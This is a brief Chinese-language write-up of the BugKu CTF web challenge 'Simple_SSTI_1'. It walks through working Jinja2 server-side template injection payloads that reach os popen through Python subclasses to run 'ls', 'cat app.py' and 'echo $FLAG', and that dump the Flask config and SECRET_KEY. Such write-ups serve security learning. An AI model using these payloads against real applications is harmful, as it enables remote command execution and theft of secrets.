BugKu - Web - Simple_SSTI_1

Simple_SSTI_1

BugKu - Web - Simple_SSTI_1_第1张图片
猜测GET传参flag:?flag=1
BugKu - Web - Simple_SSTI_1_第2张图片
测试注入:?flag=${7*7}
BugKu - Web - Simple_SSTI_1_第3张图片

?flag={{7*7}}
BugKu - Web - Simple_SSTI_1_第4张图片
?flag={{7*'7'}}
BugKu - Web - Simple_SSTI_1_第5张图片
所以该模板使用的是jinja2渲染:?flag={{[].__class__.__base__.__subclasses__()}}
BugKu - Web - Simple_SSTI_1_第6张图片
?flag={{[].__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']("ls").read()}}
BugKu - Web - Simple_SSTI_1_第7张图片
?flag={{[].__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']("cat app.py").read()}}
BugKu - Web - Simple_SSTI_1_第8张图片
?flag={{[].__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']("echo $FLAG").read()}}
BugKu - Web - Simple_SSTI_1_第9张图片

payload 2

知道这是一个jinjia,可以直接查看配置:?flag={{config}}
BugKu - Web - Simple_SSTI_1_第10张图片
也可以根据注释:?flag={{config.SECRET_KEY}}
BugKu - Web - Simple_SSTI_1_第11张图片

你可能感兴趣的:(ctf,Writeup,flask,python,后端,网络安全,web安全)